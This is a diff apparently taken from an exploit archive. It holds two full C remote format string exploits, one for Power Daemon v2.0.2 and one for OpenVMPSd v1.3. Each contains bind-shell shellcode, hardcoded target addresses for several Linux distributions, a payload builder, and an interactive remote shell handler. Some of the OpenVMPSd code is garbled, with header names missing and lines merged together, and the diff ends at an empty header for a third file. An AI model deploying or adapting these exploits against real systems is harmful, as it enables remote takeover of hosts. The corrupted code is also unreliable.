- fprintf(stdout,"\n--=[ Power Daemon Remote 
Format String Exploit ]\n\n");
-
- // Process arguments
- while ( (opt = getopt(argc,argv,"t:p:r:")) != EOF)
- {
- switch(opt)
- {
- case 'r':
- BindPort = atoi(optarg);
- if(!BindPort) Usage(argv[0]);
- break;
- case 'p':
- Port = atoi(optarg);
- if(!Port) Usage(argv[0]);
- break;
- case 't':
- TargetNumber = atoi(optarg);
- break;
- default: Usage(argv[0]);
- break;
- }
- }
-
- // Verify target
- for(i=0;;i++)
- if(Targets[i].Name == 0) break;
- if(TargetNumber == -1) Usage(argv[0]);
-
- fprintf(stdout,"[*] Plataform : %s\n",Targets[TargetNumber].Name);
- fprintf(stdout,"[*] Target GOT : %#010x\n",Targets[TargetNumber].Gotaddr);
- fprintf(stdout,"[*] Target Retaddr : %#010x\n",Targets[TargetNumber].Retaddr);
- fprintf(stdout,"[*] Bind to port : %u\n",BindPort);
- fprintf(stdout,"[*] Target POP : %d\n\n",Targets[TargetNumber].Pop);
-
- CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr,Targets[TargetNumber].Pop,BindPort,EvilBuffer);
- FakeServer(EvilBuffer, BindPort);
-}
-
-void FakeServer(char *EvilBuffer, int BindPort) {
-
- int sock, newsock, i, reuseaddr = 1;
- struct sockaddr_in remoteaddr;
- struct sockaddr_in localaddr;
- int addrlen = sizeof(struct sockaddr_in);
- struct hostent *he;
-
- localaddr.sin_family = AF_INET;
- localaddr.sin_port = htons(DEFAULT_PORT);
- localaddr.sin_addr.s_addr = INADDR_ANY;
- bzero(&(localaddr.sin_zero), 8);
-
- fprintf(stdout,"[*] Creating Fake Server : ");
-
- if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
- perror(" socket()");
- printf("\n");
- exit(1);
- }
-
- if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,
- (socklen_t)sizeof(reuseaddr)) < 0) {
- perror(" setsockopt()");
- printf("\n");
- exit(1);
- }
-
- if (bind(sock, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) {
- perror(" bind()");
- printf("\n");
- exit(1);
- }
-
- if (listen(sock, 1) < 0) {
- perror(" listen()");
- printf("\n");
- exit(1);
- }
-
- fprintf(stdout, "done\n");
-
- printf("[*] Waiting Client : ");
- fflush(stdout);
-
- if ((newsock = accept(sock, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) {
- perror(" accept()");
- printf("\n");
- exit(1);
- }
-
- if (getpeername(newsock, (struct sockaddr *)&remoteaddr, &addrlen) < 0) {
- perror(" getpeername()");
- printf("\n");
- exit(1);
- }
-
- fprintf(stdout, "done\n");
-
- fprintf(stdout, "[*] Host Connected : %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port));
-
- fprintf(stdout, "[*] Sending EvilBuffer : ");
- if(send(newsock,EvilBuffer,strlen(EvilBuffer)+1,0) == -1) {
- fatal("send()");
- }
-
- fprintf(stdout, "done\n\n");
-
- memset(EvilBuffer, 0x00, sizeof(EvilBuffer));
- strcpy(EvilBuffer, (char *)inet_ntoa(remoteaddr.sin_addr));
-
- close(newsock);
-
- sleep(1);
-
- newsock = ConectToShell(EvilBuffer,BindPort);
-
- if(newsock == -1) {
- fprintf(stdout,"[*] Exploit Failed.\n\n");
- exit(0);
- }
- else {
- fprintf(stdout,"[*] Spawning Shell...\n\n");
- ExecuteShell(newsock);
- close(newsock);
- }
-
- fflush(stdout);
-}
-
-int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer)
-{
- char *nops = malloc(NOPSIZE+1);
- char *ptr;
- unsigned short *len;
- unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET);
-
- // Fix shellcode
- *portPtr = htons(BINDTOPORT);
-
- ptr = buffer;
-
- // Create Nops
- bzero(nops,NOPSIZE+1);
- memset(nops,NOP,NOPSIZE);
-
- fprintf(stdout, "[*] Creating EvilBuffer : ");
-
- // Create format string attack
- sprintf(ptr,"WHATIDO "
- PAD
- "%c%c%c%c"
- "%c%c%c%c"
- "%%.%dd"
- "%%%d$hn"
- "%%.%dd"
- "%%%d$hn"
- "%s%s",
- ((u_long)GOT),
- ((u_long)GOT >> 8),
- ((u_long)GOT >> 16),
- ((u_long)GOT >> 24),
- ((u_long)GOT+2),
- (((u_long)GOT+2) >> 8),
- (((u_long)GOT+2) >> 16),
- (((u_long)GOT+2) >> 24),
- ((RETADDR & 0x0000FFFF) - 26),
- POP,
- (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)),
- POP+1,nops,shellcode);
- fprintf(stdout, "done\n");
- fflush(stdout);
-
- return (strlen(ptr));
-}
-
-int ConectToShell(char 
*Host,int Port)
-{
- struct sockaddr_in server;
- struct hostent *hp;
- int s;
-
- server.sin_family = AF_INET;
- hp = gethostbyname(Host);
- if(!hp) return(-1);
-
- memcpy(&server.sin_addr,hp->h_addr,hp->h_length);
- server.sin_port = htons(Port);
-
- s = socket(PF_INET,SOCK_STREAM,0);
- if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0)
- return(-1);
-
- return(s);
-}
-
-void ExecuteShell(int Sock)
-{
- char buffer[1024 * 10];
- int count;
- fd_set readfs;
-
- write(Sock,"uname -a;id\n",12);
- while(1)
- {
- FD_ZERO(&readfs);
- FD_SET(STDIN, &readfs);
- FD_SET(Sock, &readfs);
- if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0)
- {
- if(FD_ISSET(STDIN, &readfs))
- {
- if((count = read(STDIN, buffer, 1024)) <= 0)
- {
- if(errno == EWOULDBLOCK || errno == EAGAIN)
- continue;
- else
- {
- close(Sock);
- exit(-1);
- }
- }
- write(Sock, buffer, count);
- }
- if(FD_ISSET(Sock, &readfs))
- {
- if((count = read(Sock, buffer, 1024)) <= 0)
- {
- if(errno == EWOULDBLOCK || errno == EAGAIN)
- continue;
- else
- {
- close(Sock);
- exit(-1);
- }
- }
- write(STDOUT, buffer, count);
- }
- }
- }
-}
-
-void fatal(char *ErrorMsg)
-{
- fprintf(stderr,"ERROR - %s\n\n",ErrorMsg);
- exit(1);
-}
-
-
-void Usage(char *Prog)
-{
- int i;
- fprintf(stderr, "Usage: %s \n\n"
- "Options:\n\n"
- " -t target : Select the target\n"
- " -p portnumber : Sets a new port number \n"
- " -r bindport : Sets the port to bind a shell \n\n"
- "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT);
-
- for(i=0;;i++)
- {
- if(Targets[i].Name != 0)
- fprintf(stderr," [%u] %s\n",i,Targets[i].Name);
- else
- break;
- }
- fprintf(stderr,"\n");
- exit(1);
-}
-
-// milw0rm.com [2006-02-10]
+/*
+ * gexp-powerd.c
+ *
+ * Power Daemon v2.0.2 Remote Format String Exploit
+ * Copyright (C) 2005 Gotfault Security
+ *
+ * Bug found and developed by: barros and xgc
+ *
+ * Original Reference:
+ * http://gotfault.net/research/exploit/gexp-powerd.c
+ *
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+/*==[ Prototypes ]==*/
+void fatal(char *);
+void Usage(char *);
+void FakeServer(char *,int);
+void ExecuteShell(int);
+int CreateEvilBuffer(int,int,int,int,char *);
+int ConnectToShell(char *,int);
+
+/*==[ Defines ]==*/
+#define DEFAULT_PORT 532 // Default fake server port
+#define BIND_PORT 31337 // Default port to bind
+#define NOPSIZE 50 // Number of NOP
+#define NOP 0x90 // NOP byte
+#define PAD "" // Format string alignment
+#define PORT_OFFSET 29 // Offset to fix the shellcode
+#define STDIN 0
+#define STDOUT 1
+
+/*==[ Targets ]==*/
+struct
+{
+ char *Name;
+ int Gotaddr;
+ int Retaddr;
+ int Pop;
+}Targets[] =
+ {
+ "Power Daemon v2.0.2 @ Slackware 10.0",
+ 0x0804c180,
+ 0xbffff2d4,
+ 17,
+
+ "Power Daemon v2.0.2 @ Debian 3.1 Linux",
+ 0x0804c198,
+ 0xbffff16c,
+ 27,
+
+ // Finish
+ 0,
+ 0,
+ 0,
+ 0
+ };
+
+/*==[ Shellcode by Marco Ivaldi ]==*/
+char shellcode[] =
+ "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
+ "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
+ "\x89\xc7\x52\x66\x68"
+ "BP" // Port to bind
+ "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80"
+ "\xb0\x66\xb3\x04\xcd\x80"
+ "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80"
+ "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
+ "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+int main(int argc, char **argv)
+{
+ extern char *optarg;
+ extern int optind;
+ char opt;
+ char *Host = NULL;
+ int Port = DEFAULT_PORT;
+ int BindPort = BIND_PORT;
+ int TargetNumber = -1;
+ int Sock,i;
+ char EvilBuffer[1024];
+ int BufLen;
+
+ fprintf(stdout,"\n--=[ Power Daemon Remote Format String Exploit ]\n\n");
+
+ // Process arguments
+ while ( (opt = getopt(argc,argv,"t:p:r:")) != EOF)
+ {
+ switch(opt)
+ {
+ case 'r':
+ BindPort = atoi(optarg);
+ if(!BindPort) Usage(argv[0]);
+ break;
+ case 'p':
+ Port = atoi(optarg);
+ if(!Port) Usage(argv[0]);
+ break;
+ case 't':
+ TargetNumber = atoi(optarg);
+ break;
+ default: 
Usage(argv[0]);
+ break;
+ }
+ }
+
+ // Verify target
+ for(i=0;;i++)
+ if(Targets[i].Name == 0) break;
+ if(TargetNumber == -1) Usage(argv[0]);
+
+ fprintf(stdout,"[*] Plataform : %s\n",Targets[TargetNumber].Name);
+ fprintf(stdout,"[*] Target GOT : %#010x\n",Targets[TargetNumber].Gotaddr);
+ fprintf(stdout,"[*] Target Retaddr : %#010x\n",Targets[TargetNumber].Retaddr);
+ fprintf(stdout,"[*] Bind to port : %u\n",BindPort);
+ fprintf(stdout,"[*] Target POP : %d\n\n",Targets[TargetNumber].Pop);
+
+ CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr,Targets[TargetNumber].Pop,BindPort,EvilBuffer);
+ FakeServer(EvilBuffer, BindPort);
+}
+
+void FakeServer(char *EvilBuffer, int BindPort) {
+
+ int sock, newsock, i, reuseaddr = 1;
+ struct sockaddr_in remoteaddr;
+ struct sockaddr_in localaddr;
+ int addrlen = sizeof(struct sockaddr_in);
+ struct hostent *he;
+
+ localaddr.sin_family = AF_INET;
+ localaddr.sin_port = htons(DEFAULT_PORT);
+ localaddr.sin_addr.s_addr = INADDR_ANY;
+ bzero(&(localaddr.sin_zero), 8);
+
+ fprintf(stdout,"[*] Creating Fake Server : ");
+
+ if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
+ perror(" socket()");
+ printf("\n");
+ exit(1);
+ }
+
+ if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,
+ (socklen_t)sizeof(reuseaddr)) < 0) {
+ perror(" setsockopt()");
+ printf("\n");
+ exit(1);
+ }
+
+ if (bind(sock, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) {
+ perror(" bind()");
+ printf("\n");
+ exit(1);
+ }
+
+ if (listen(sock, 1) < 0) {
+ perror(" listen()");
+ printf("\n");
+ exit(1);
+ }
+
+ fprintf(stdout, "done\n");
+
+ printf("[*] Waiting Client : ");
+ fflush(stdout);
+
+ if ((newsock = accept(sock, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) {
+ perror(" accept()");
+ printf("\n");
+ exit(1);
+ }
+
+ if (getpeername(newsock, (struct sockaddr *)&remoteaddr, &addrlen) < 0) {
+ perror(" getpeername()");
+ printf("\n");
+ exit(1);
+ }
+
+ fprintf(stdout, "done\n");
+
+ fprintf(stdout, "[*] 
Host Connected : %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port));
+
+ fprintf(stdout, "[*] Sending EvilBuffer : ");
+ if(send(newsock,EvilBuffer,strlen(EvilBuffer)+1,0) == -1) {
+ fatal("send()");
+ }
+
+ fprintf(stdout, "done\n\n");
+
+ memset(EvilBuffer, 0x00, sizeof(EvilBuffer));
+ strcpy(EvilBuffer, (char *)inet_ntoa(remoteaddr.sin_addr));
+
+ close(newsock);
+
+ sleep(1);
+
+ newsock = ConectToShell(EvilBuffer,BindPort);
+
+ if(newsock == -1) {
+ fprintf(stdout,"[*] Exploit Failed.\n\n");
+ exit(0);
+ }
+ else {
+ fprintf(stdout,"[*] Spawning Shell...\n\n");
+ ExecuteShell(newsock);
+ close(newsock);
+ }
+
+ fflush(stdout);
+}
+
+int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer)
+{
+ char *nops = malloc(NOPSIZE+1);
+ char *ptr;
+ unsigned short *len;
+ unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET);
+
+ // Fix shellcode
+ *portPtr = htons(BINDTOPORT);
+
+ ptr = buffer;
+
+ // Create Nops
+ bzero(nops,NOPSIZE+1);
+ memset(nops,NOP,NOPSIZE);
+
+ fprintf(stdout, "[*] Creating EvilBuffer : ");
+
+ // Create format string attack
+ sprintf(ptr,"WHATIDO "
+ PAD
+ "%c%c%c%c"
+ "%c%c%c%c"
+ "%%.%dd"
+ "%%%d$hn"
+ "%%.%dd"
+ "%%%d$hn"
+ "%s%s",
+ ((u_long)GOT),
+ ((u_long)GOT >> 8),
+ ((u_long)GOT >> 16),
+ ((u_long)GOT >> 24),
+ ((u_long)GOT+2),
+ (((u_long)GOT+2) >> 8),
+ (((u_long)GOT+2) >> 16),
+ (((u_long)GOT+2) >> 24),
+ ((RETADDR & 0x0000FFFF) - 26),
+ POP,
+ (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)),
+ POP+1,nops,shellcode);
+ fprintf(stdout, "done\n");
+ fflush(stdout);
+
+ return (strlen(ptr));
+}
+
+int ConectToShell(char *Host,int Port)
+{
+ struct sockaddr_in server;
+ struct hostent *hp;
+ int s;
+
+ server.sin_family = AF_INET;
+ hp = gethostbyname(Host);
+ if(!hp) return(-1);
+
+ memcpy(&server.sin_addr,hp->h_addr,hp->h_length);
+ server.sin_port = htons(Port);
+
+ s = socket(PF_INET,SOCK_STREAM,0);
+ if(connect(s,(struct sockaddr *)&server, sizeof(server)) 
< 0)
+ return(-1);
+
+ return(s);
+}
+
+void ExecuteShell(int Sock)
+{
+ char buffer[1024 * 10];
+ int count;
+ fd_set readfs;
+
+ write(Sock,"uname -a;id\n",12);
+ while(1)
+ {
+ FD_ZERO(&readfs);
+ FD_SET(STDIN, &readfs);
+ FD_SET(Sock, &readfs);
+ if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0)
+ {
+ if(FD_ISSET(STDIN, &readfs))
+ {
+ if((count = read(STDIN, buffer, 1024)) <= 0)
+ {
+ if(errno == EWOULDBLOCK || errno == EAGAIN)
+ continue;
+ else
+ {
+ close(Sock);
+ exit(-1);
+ }
+ }
+ write(Sock, buffer, count);
+ }
+ if(FD_ISSET(Sock, &readfs))
+ {
+ if((count = read(Sock, buffer, 1024)) <= 0)
+ {
+ if(errno == EWOULDBLOCK || errno == EAGAIN)
+ continue;
+ else
+ {
+ close(Sock);
+ exit(-1);
+ }
+ }
+ write(STDOUT, buffer, count);
+ }
+ }
+ }
+}
+
+void fatal(char *ErrorMsg)
+{
+ fprintf(stderr,"ERROR - %s\n\n",ErrorMsg);
+ exit(1);
+}
+
+
+void Usage(char *Prog)
+{
+ int i;
+ fprintf(stderr, "Usage: %s \n\n"
+ "Options:\n\n"
+ " -t target : Select the target\n"
+ " -p portnumber : Sets a new port number \n"
+ " -r bindport : Sets the port to bind a shell \n\n"
+ "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT);
+
+ for(i=0;;i++)
+ {
+ if(Targets[i].Name != 0)
+ fprintf(stderr," [%u] %s\n",i,Targets[i].Name);
+ else
+ break;
+ }
+ fprintf(stderr,"\n");
+ exit(1);
+}
+
+// milw0rm.com [2006-02-10]
diff --git a/platforms/linux/remote/1487.c b/platforms/linux/remote/1487.c
index b0b011046..fc0a38c60 100755
--- a/platforms/linux/remote/1487.c
+++ b/platforms/linux/remote/1487.c
@@ -1,347 +1,347 @@ -/* - * gexp-openvmpsd.c - * - * OpenVMPSd v1.3 Remote Format String Exploit - * Copyright (C) 2005 Gotfault Security - * - * Bug found and developed by: barros and xgc - * - * Original Reference: - * http://gotfault.net/research/exploit/gexp-openvmpsd.c - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/*==[ Prototypes ]==*/ -void Usage(char *); -void fatal(char *); -int CreateEvilBuffer(int, int, int, int, char *); -void ExecuteShell(int); -void SendBuffer(int , char *, int); -int CreateUdpSocket(void); -int ConectToHost(char *, int); - -/*==[ Defines ]==*/ -#define DEFAULT_PORT 1589 // Default server port -#define BIND_PORT 31337 // Default port to bind -#define NOPSIZE 50 // Do not change this value cause the shellcode space is "limited" -#define NOP 0x90 // Nop value -#define PAD "..." // Format string alignment -#define PORT_OFFSET 29 // Offset to fix the shellcode - -/*==[ Targets ]==*/ -struct -{ - char *Name; - int Gotaddr; - int Retaddr; - int Pop; -}Targets[] = - { - "OpenVMPSd v1.3 @ Slackware 10.0", - 0x0804e57c, - 0xbffff4f5, - 19, - - "OpenVMPSd v1.3 @ Debian 3.0 Linux", - 0x0804d0f8, - 0xbffff7ac, - 29, - - "OpenVMPSd v1.3 @ Fedora Core 2", - 0x0804d0f8, - 0xbffff7ac, - 19, - - // Finish - 0, - 0, - 0, - 0 - }; - -/*==[ Shellcode by Marco Ivaldi ]==*/ -char shellcode[] = - "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" - "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" - "\x89\xc7\x52\x66\x68" - "BP" // Port to bind - "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" - "\xb0\x66\xb3\x04\xcd\x80" - "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" - "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" - "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; - -/*==[ OpenVMPSd UDP packet header ]==*/ -#define SIZE_OF_HEADER 14 -char header[] = "\x41\x01\x41\x01\x41\x41\x41\x41\x00\x00\x0c\x02"; - -int main(int argc, char **argv) -{ - 
extern char *optarg; - extern int optind; - char opt; - char *Host = NULL; - int Port = DEFAULT_PORT; - int BindPort = BIND_PORT; - int TargetNumber = 0; - int Sock,i; - char *EvilBuffer; - int BufLen; - - fprintf(stdout,"\n--=[ OpenVMPSd Remote Format String Exploit ]\n\n"); - - // Process arguments - while ( (opt = getopt(argc,argv,"h:t:p:r:")) != EOF) - { - switch(opt) - { - case 'r': - BindPort = atoi(optarg); - if(!BindPort) Usage(argv[0]); - break; - case 'p': - Port = atoi(optarg); - if(!Port) Usage(argv[0]); - break; - case 't': - TargetNumber = atoi(optarg); - break; - case 'h': - Host = optarg; - break; - default: Usage(argv[0]); - break; - } - } - if(Host == NULL) Usage(argv[0]); - - // Verify target - for(i=0;;i++) - if(Targets[i].Name == 0) break; - if(--ih_addr,hp->h_length); - server.sin_port = htons(Port); - - s = socket(PF_INET,SOCK_DGRAM,0); - if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) - return(-1); - - return(s); -} - -int ConectToShell(char *Host,int Port) -{ - struct sockaddr_in server; - struct hostent *hp; - int s; - - server.sin_family = AF_INET; - hp = gethostbyname(Host); - if(!hp) return(-1); - - memcpy(&server.sin_addr,hp->h_addr,hp->h_length); - server.sin_port = htons(Port); - - s = socket(PF_INET,SOCK_STREAM,0); - if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) - return(-1); - - return(s); -} - -int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer) -{ - char *nops = malloc(NOPSIZE+1); - char *ptr; - unsigned short *len; - unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET); - - // Fix shellcode - *portPtr = htons(BINDTOPORT); - - // Header - ptr = buffer; - memcpy(ptr,header,12); - ptr += SIZE_OF_HEADER; - len = (unsigned short *)(buffer + SIZE_OF_HEADER - 2); - - // Create Nops - bzero(nops,NOPSIZE+1); - memset(nops,NOP,NOPSIZE); - - // Create format string attack - sprintf(ptr, - PAD - "%c%c%c%c" - "%c%c%c%c" - "%%.%dd" - "%%%d$hn" - "%%.%dd" - "%%%d$hn" - 
"%s%s", - ((u_long)GOT), - ((u_long)GOT >> 8), - ((u_long)GOT >> 16), - ((u_long)GOT >> 24), - ((u_long)GOT+2), - (((u_long)GOT+2) >> 8), - (((u_long)GOT+2) >> 16), - (((u_long)GOT+2) >> 24), - ((RETADDR & 0x0000FFFF) - 9 - 63), - POP, - (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)) - 1, - POP+1,nops,shellcode); - - *len = htons(strlen(ptr)); - - return (strlen(ptr)+14); -} - -#define STDIN 0 -#define STDOUT 1 -void ExecuteShell(int Sock) -{ - char buffer[1024 * 10]; - int count; - fd_set readfs; - - write(Sock,"uname -a;id\n",12); - while(1) - { - FD_ZERO(&readfs); - FD_SET(STDIN, &readfs); - FD_SET(Sock, &readfs); - if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0) - { - if(FD_ISSET(STDIN, &readfs)) - { - if((count = read(STDIN, buffer, 1024)) <= 0) - { - if(errno == EWOULDBLOCK || errno == EAGAIN) - continue; - else - { - close(Sock); - exit(-1); - } - } - write(Sock, buffer, count); - } - if(FD_ISSET(Sock, &readfs)) - { - if((count = read(Sock, buffer, 1024)) <= 0) - { - if(errno == EWOULDBLOCK || errno == EAGAIN) - continue; - else - { - close(Sock); - exit(-1); - } - } - write(STDOUT, buffer, count); - } - } - } -} - -void fatal(char *ErrorMsg) -{ - fprintf(stderr,"ERROR - %s\n\n",ErrorMsg); - exit(1); -} - -void Usage(char *Prog) -{ - int i; - fprintf(stderr, "Usage: %s -h hostname \n\n" - "Options:\n\n" - " -t target : Select the target\n" - " -p portnumber : Sets a new port number \n" - " -r bindport : Sets the port to bind a shell \n\n" - "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT); - - for(i=0;;i++) - { - if(Targets[i].Name != 0) - fprintf(stderr," [%u] %s\n",i,Targets[i].Name); - else - break; - } - fprintf(stderr,"\n"); - exit(1); -} - -// milw0rm.com [2006-02-10] +/* + * gexp-openvmpsd.c + * + * OpenVMPSd v1.3 Remote Format String Exploit + * Copyright (C) 2005 Gotfault Security + * + * Bug found and developed by: barros and xgc + * + * Original Reference: + * http://gotfault.net/research/exploit/gexp-openvmpsd.c + * + */ + 
+#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/*==[ Prototypes ]==*/ +void Usage(char *); +void fatal(char *); +int CreateEvilBuffer(int, int, int, int, char *); +void ExecuteShell(int); +void SendBuffer(int , char *, int); +int CreateUdpSocket(void); +int ConectToHost(char *, int); + +/*==[ Defines ]==*/ +#define DEFAULT_PORT 1589 // Default server port +#define BIND_PORT 31337 // Default port to bind +#define NOPSIZE 50 // Do not change this value cause the shellcode space is "limited" +#define NOP 0x90 // Nop value +#define PAD "..." // Format string alignment +#define PORT_OFFSET 29 // Offset to fix the shellcode + +/*==[ Targets ]==*/ +struct +{ + char *Name; + int Gotaddr; + int Retaddr; + int Pop; +}Targets[] = + { + "OpenVMPSd v1.3 @ Slackware 10.0", + 0x0804e57c, + 0xbffff4f5, + 19, + + "OpenVMPSd v1.3 @ Debian 3.0 Linux", + 0x0804d0f8, + 0xbffff7ac, + 29, + + "OpenVMPSd v1.3 @ Fedora Core 2", + 0x0804d0f8, + 0xbffff7ac, + 19, + + // Finish + 0, + 0, + 0, + 0 + }; + +/*==[ Shellcode by Marco Ivaldi ]==*/ +char shellcode[] = + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" + "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" + "\x89\xc7\x52\x66\x68" + "BP" // Port to bind + "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" + "\xb0\x66\xb3\x04\xcd\x80" + "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" + "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" + "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; + +/*==[ OpenVMPSd UDP packet header ]==*/ +#define SIZE_OF_HEADER 14 +char header[] = "\x41\x01\x41\x01\x41\x41\x41\x41\x00\x00\x0c\x02"; + +int main(int argc, char **argv) +{ + extern char *optarg; + extern int optind; + char opt; + char *Host = NULL; + int Port = DEFAULT_PORT; + int BindPort = BIND_PORT; + int TargetNumber = 0; + int Sock,i; + char *EvilBuffer; + int BufLen; + + fprintf(stdout,"\n--=[ OpenVMPSd Remote Format String Exploit ]\n\n"); + + // 
Process arguments + while ( (opt = getopt(argc,argv,"h:t:p:r:")) != EOF) + { + switch(opt) + { + case 'r': + BindPort = atoi(optarg); + if(!BindPort) Usage(argv[0]); + break; + case 'p': + Port = atoi(optarg); + if(!Port) Usage(argv[0]); + break; + case 't': + TargetNumber = atoi(optarg); + break; + case 'h': + Host = optarg; + break; + default: Usage(argv[0]); + break; + } + } + if(Host == NULL) Usage(argv[0]); + + // Verify target + for(i=0;;i++) + if(Targets[i].Name == 0) break; + if(--ih_addr,hp->h_length); + server.sin_port = htons(Port); + + s = socket(PF_INET,SOCK_DGRAM,0); + if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) + return(-1); + + return(s); +} + +int ConectToShell(char *Host,int Port) +{ + struct sockaddr_in server; + struct hostent *hp; + int s; + + server.sin_family = AF_INET; + hp = gethostbyname(Host); + if(!hp) return(-1); + + memcpy(&server.sin_addr,hp->h_addr,hp->h_length); + server.sin_port = htons(Port); + + s = socket(PF_INET,SOCK_STREAM,0); + if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) + return(-1); + + return(s); +} + +int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer) +{ + char *nops = malloc(NOPSIZE+1); + char *ptr; + unsigned short *len; + unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET); + + // Fix shellcode + *portPtr = htons(BINDTOPORT); + + // Header + ptr = buffer; + memcpy(ptr,header,12); + ptr += SIZE_OF_HEADER; + len = (unsigned short *)(buffer + SIZE_OF_HEADER - 2); + + // Create Nops + bzero(nops,NOPSIZE+1); + memset(nops,NOP,NOPSIZE); + + // Create format string attack + sprintf(ptr, + PAD + "%c%c%c%c" + "%c%c%c%c" + "%%.%dd" + "%%%d$hn" + "%%.%dd" + "%%%d$hn" + "%s%s", + ((u_long)GOT), + ((u_long)GOT >> 8), + ((u_long)GOT >> 16), + ((u_long)GOT >> 24), + ((u_long)GOT+2), + (((u_long)GOT+2) >> 8), + (((u_long)GOT+2) >> 16), + (((u_long)GOT+2) >> 24), + ((RETADDR & 0x0000FFFF) - 9 - 63), + POP, + (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - 
(RETADDR & 0x0000FFFF)) - 1,
+ POP+1,nops,shellcode);
+
+ *len = htons(strlen(ptr));
+
+ return (strlen(ptr)+14);
+}
+
+#define STDIN 0
+#define STDOUT 1
+void ExecuteShell(int Sock)
+{
+ char buffer[1024 * 10];
+ int count;
+ fd_set readfs;
+
+ write(Sock,"uname -a;id\n",12);
+ while(1)
+ {
+ FD_ZERO(&readfs);
+ FD_SET(STDIN, &readfs);
+ FD_SET(Sock, &readfs);
+ if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0)
+ {
+ if(FD_ISSET(STDIN, &readfs))
+ {
+ if((count = read(STDIN, buffer, 1024)) <= 0)
+ {
+ if(errno == EWOULDBLOCK || errno == EAGAIN)
+ continue;
+ else
+ {
+ close(Sock);
+ exit(-1);
+ }
+ }
+ write(Sock, buffer, count);
+ }
+ if(FD_ISSET(Sock, &readfs))
+ {
+ if((count = read(Sock, buffer, 1024)) <= 0)
+ {
+ if(errno == EWOULDBLOCK || errno == EAGAIN)
+ continue;
+ else
+ {
+ close(Sock);
+ exit(-1);
+ }
+ }
+ write(STDOUT, buffer, count);
+ }
+ }
+ }
+}
+
+void fatal(char *ErrorMsg)
+{
+ fprintf(stderr,"ERROR - %s\n\n",ErrorMsg);
+ exit(1);
+}
+
+void Usage(char *Prog)
+{
+ int i;
+ fprintf(stderr, "Usage: %s -h hostname \n\n"
+ "Options:\n\n"
+ " -t target : Select the target\n"
+ " -p portnumber : Sets a new port number \n"
+ " -r bindport : Sets the port to bind a shell \n\n"
+ "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT);
+
+ for(i=0;;i++)
+ {
+ if(Targets[i].Name != 0)
+ fprintf(stderr," [%u] %s\n",i,Targets[i].Name);
+ else
+ break;
+ }
+ fprintf(stderr,"\n");
+ exit(1);
+}
+
+// milw0rm.com [2006-02-10]
diff --git a/platforms/linux/remote/1574.c b/platforms/linux/remote/1574.c
index 77d1820db..fe441f027 100755
--- a/platforms/linux/remote/1574.c
